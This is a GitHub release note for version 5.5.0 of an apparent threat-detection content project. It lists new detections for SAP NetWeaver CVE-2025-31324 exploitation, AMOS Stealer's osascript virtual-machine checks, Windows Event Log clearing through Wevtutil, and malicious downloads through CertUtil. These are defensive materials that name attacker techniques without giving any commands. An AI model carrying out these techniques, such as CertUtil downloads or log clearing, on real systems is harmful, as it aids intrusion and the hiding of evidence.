Skip to content

v5.5.0
Compare
Choose a tag to compare
@patel-bhavin patel-bhavin released this 08 May 17:38
· 501 commits to develop since this release
v5.5.0
c01f075
This commit was created on GitHub.com and signed with GitHub’s verified signature.
GPG key ID: B5690EEEBB952194
Verified
Learn about vigilant mode.

Highlights

  • 🛡️ SAP NetWeaver Exploitation
    Released a new analytic story targeting CVE-2025-31324 in SAP NetWeaver, including a dedicated hunting detection for “SAP NetWeaver Visual Composer Exploitation Attempt” to catch early signs of exploitation. You can read more about this vulnerability here.

  • 🍏 AMOS Stealer Analytics
    Added a new analytic story for AMOS Stealer and introduced the “macOS AMOS Stealer – Virtual Machine Check Activity” detection, which looks for the execution of the osascript command along with specific command-line strings.

  • 🪟 Additional Windows Detections
    We shipped three new Windows-focused detections to improve visibility into post-compromise activity: one that identifies reconnaissance by monitoring built-in log query utilities against the Windows Event Log, another that alerts when an adversary clears the Event Log via Wevtutil, and a third that detects malicious file downloads executed through the CertUtil utility.

New Analytic Story - [2]

New Analytics - [5]

Other Updates

  • Updated theis_nirsoft_software lookup with additional nirsoft tooling
  • Updated attack_data links for several detections.
Assets 3
Loading